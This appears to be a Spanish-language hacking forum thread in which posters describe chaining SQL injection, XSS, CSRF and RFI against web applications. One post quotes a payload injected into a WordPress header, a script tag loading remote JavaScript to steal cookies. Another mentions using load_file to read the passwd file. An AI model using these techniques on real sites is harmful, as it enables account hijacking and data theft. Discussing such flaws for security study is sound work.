Se puede dar el caso de a una misma variable se le de diferentes usos, por ejemplo...

Puedo realizar una consulta SQL poniendo en la clausula WHERE la variable, tipo GET y no filtrada, str, y a la misma vez, imprimir en la página el valor de la variable str.

Al no estar filtrada dicha variable se podrá realizar un ataque de inyección SQL y un ataque XSS al mismo tiempo, siempre y cuando se sepa jugar con la sintaxis de la inyección para no obtener errores.

depende de cada aplicación, por ejemplo, podrias usar un CSRF para explotar un SQLinjection que solo es explotable en contexto de admin, y gracias a ese SQLinjection, generar un vector de XSS que te mande las cookies, o haga un ataque especifico.. he usado esto 1 sola vez, (un SQLinjection que modificaba el codigo del header, agregando un <script src=//misitio.com/js></script>, pero para explotarlo tenia que estar registrado como admin en wordpress, asi que lo combine con csrf xD).

Saludos!!

Yep, alguna vez me encontre con una web que tenia XSS, al mandar el fuzzer con strings, me resulto un MySQL error, de ahi me logre injectar parametros con load_file para obtener el passwd, siempre se trastea demasiado por los "Sintaxis Errors" pero ello me llevo a otros bug sobre un PHP, un valiosisimo RFI (Remote File Incllusion), 3 vulnerabilidades que me ayudaron a obtener mejores resultados...

berz3k.